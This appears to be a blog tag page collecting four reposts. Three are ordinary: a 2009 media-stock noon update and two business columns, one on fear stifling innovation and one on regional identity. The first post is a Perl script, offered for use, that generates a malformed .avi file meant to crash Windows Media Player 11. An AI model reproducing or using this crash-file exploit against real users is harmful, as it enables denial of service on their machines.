'Media'에 해당되는 글 4건

  1. 2011.04.02 Windows Media player 11.0.5721.5145 Buffer overflow/DOS Exploit by CEOinIRVINE 2
  2. 2009.05.02 Midday Glance: Media companies by CEOinIRVINE
  3. 2008.12.06 Stop The Fear Epidemic by CEOinIRVINE
  4. 2008.11.24 You Are Where You Live by CEOinIRVINE
#!/usr/bin/perl
#(+)Exploit Title: Windows Media player 11.0.5721.5145 Buffer overflow/DOS Exploit
#(+)Software  : Windows Media player
#(+)Version   : 11.0.5721.5145
#(+)Tested On : WIN-XP SP3
#(+) Date     : 31.03.2011
#(+) Hour     : 13:37
#Similar Bug was found by cr4wl3r in MediaPlayer Classic

system("color 6");
system("title Windows Media player 11.0.5721.5145 Buffer overflow/DOS Exploit");
print "
_______________________________________________________________________
                                                                   
(+)Exploit Title:  Windows Media player 11.0.5721.5145 Buffer overflow/DOS Exploit
 
       
(+) Software  : Windows Media player
(+) Version   : 11.0.5721.5145                                   
(+) Tested On : WIN-XP SP3                                               
(+) Date      : 31.03.2011                                               
(+) Hour      : 13:37 PM                                                   
____________________________________________________________________\n    ";
sleep 2;
system("cls");
system("color 2");
print "\nGenerating the exploit file !!!";
sleep 2;
print "\n\nWMPExploit.avi file generated!!";
sleep 2;
$theoverflow = "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";
 
open(file, "> WMPExploit.avi");
print (file $theoverflow);
print "\n\n(+) Done!\n
(+) Now Just open WMPExplot.avi with Windows Media player and Kaboooommm !! ;) \n
(+) Most of the times there is a crash\n whenever you open the folder where the WMPExploit.avi is stored :D \n";

sleep 3;
system("cls");
sleep 1;
system("color C");
print "\n\n\n########################################################################\n
(+)Exploit Coded by: ^Xecuti0N3r\n
(+)^Xecuti0N3r: E-mail : xecuti0n3r@yahoo.com \n
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r & aNnIh!LatioN3r \n
########################################################################\n\n";
system("pause");

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Posted by CEOinIRVINE
l

Shares of some top media companies are mixed at noon:

Disney ( DIS - news - people ) fell $.69 or 3.2 percent, to $21.21.

 Times fell $.03 or .6 percent, to $5.35.

News Corp fell $.02 or .2 percent, to $9.10.

TimeWrn rs rose $.14 or .6 percent, to $21.97.

Real-Time Quotes
05/01/2009 1:34PM ET
  • DIS
  • $21.68
  • -1.00%
  • NYT
  • $5.41
  • 0.56%
  • NWS
  • $9.17
  • 0.55%
  • TWX
  • $22.66
  • 3.80%

Viacom ( VIA - news - people ) fell $.30 or 1.5 percent, to $20.36.

Copyright 2009 Associated Press. All rights reserved. This material may not be published broadcast, rewritten, or redistribute

Posted by CEOinIRVINE
l

Stop The Fear Epidemic

Business 2008. 12. 6. 03:43

Stop The Fear Epidemic

Sramana Mitra, 12.05.08, 06:00 AM EST

The media need to help foster innovation and entrepreneurship, not squash it.

Sramana Mitra
pic
More By This Author

The first decade of the 21st century has brought us a series of major economic and geopolitical shocks: the dot-com bust, the Sept. 11 attacks on New York, the financial crisis led by the subprime meltdown, and just last week, a fresh bout of terrorist attacks in Mumbai that threatens to destabilize the very significant and growing economy of India.

The most worrisome implication of these successive events is that the world will tailspin into a fear psychosis and all the drivers of progress and prosperity--innovation, entrepreneurship, consumer confidence and reform--will get paralyzed.

I am writing this column on a long flight from San Francisco to Singapore. Among the various books I have read on this flight is Judy Estrin's new book, Closing The Innovation Gap. Estrin, chief executive of JLabs and an adviser on President-elect Barack Obama's transition team, is deeply concerned about this fear psychosis that threatens to stifle innovation. She believes that the "soup" that provides the basis of innovation is currently being poisoned. "The soup starts with some common ingredients, a set of human attitudes and beliefs that are so critical that I call them the five core values of innovation: questioning, risk-taking, openness, patience and trust," Estrin writes. (Here's an excerpt from her book.)

And yet, when the dominant psychological premise of society is fear, how can people access essential factors like openness, risk-taking and trust? Thus, it is of paramount importance right now for us to address the fear issue from taking over human ingenuity.

I've thought long and hard, and watched how the fear epidemic spreads. Just recently, a well-respected Silicon Valley venture capital firm, Sequoia Capital, released a PowerPoint presentation that spread like a plague through the Internet, faster than Obamamania. In it, the esteemed firm made a grand display of irresponsible leadership by circulating the same germs of fear that we desperately need to prevent from spreading.

What did the media do in response? Top bloggers, major business and technology publications and otherwise respectable journalists became willing carriers of the virus. They published the presentation on their blogs and Web sites, and discussed and echoed the very sentiments of negativity that oozed out of Sequoia's presentation.

This is an example of how the epidemic spreads. And this is exactly how the epidemic cannot be allowed to spread going forward. No matter what happens--however dire the world events become--we must not allow fear to rule us like this.

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Posted by CEOinIRVINE
l

You Are Where You Live

Business 2008. 11. 24. 01:39

The global mass media change a lot of things, but regional identity probably isn't one of them.

It's been nearly 50 years since Marshall McLuhan coined the term "global village" to describe the shared (if largely vicarious) experience that television and other electronic media were fast creating. One of the foundational principles of the global village--which, of course, the Internet has expanded by some vast multiple--is that electronic media doesn't just serve people; it changes people.

As more people communicate over greater distances, goes the theory, the less important are geographic regions as unique repositories of ideas, languages and moral sensibilities--in a word, culture. If so, the cultural differences once assumed to distinguish, say, New Yorkers from Texas farmers should become increasingly vestigial artifacts of a pre-Google world.

But if freedom from geographic constraints means liberation from regional identity, why do many Americans still think in terms of the Midwest vote, Southern conservatism, urban this and rural that? If the entire globe is connected to the same cultural mother ship--drinking the same Starbucks, driving the same cars, using the same search engines, watching the same CNN--how is it that one can still identify regional politics, tastes, values, idioms--the very substance of identity? Were the prophets of convergence wrong?

One argument in their favor is that convergence simply hasn't had enough time-- the global village, after all, is still a new entity by historical standards. You don't have to believe in "the end of history" to recognize how much more alike, at least superficially, far-flung places are today than 100 years ago.

Consumerism, once thought of as a uniquely American phenomenon, is now a staple of life from Kuala Lumpur to Santiago. Drive down a highway anywhere in the U.S., and the first thing that strikes you is how alike every place looks--the same strip malls, the same visual clutter, the same boxy office buildings, whether you're in New Hampshire or New Mexico. (The architectural vernaculars that once distinguished regions from each other are now largely quaint, secondary relics preserved by self-conscious historical societies.)

An American visiting Bangkok, Thailand, 100 years ago would have been struck primarily by its otherness. Today he's struck by its sameness--the same consumer products, the same cars, even the same language (English is common there) as back in Houston. Project the arc of convergence out a few decades, and it's not hard to see regional origin being relegated to a rather minor component of personal identity.

Of course, the world is not a linear equation, and there are forces working to resist the trend. Proximity is surely one of them. There is a whole academic discipline that says, in effect, that you are who you know. So-called "social impact theory" holds that the stronger and more immediate your relationships, the more likely you are to adopt your friends' values, regardless of what else you might read, watch or hear.





Posted by CEOinIRVINE
l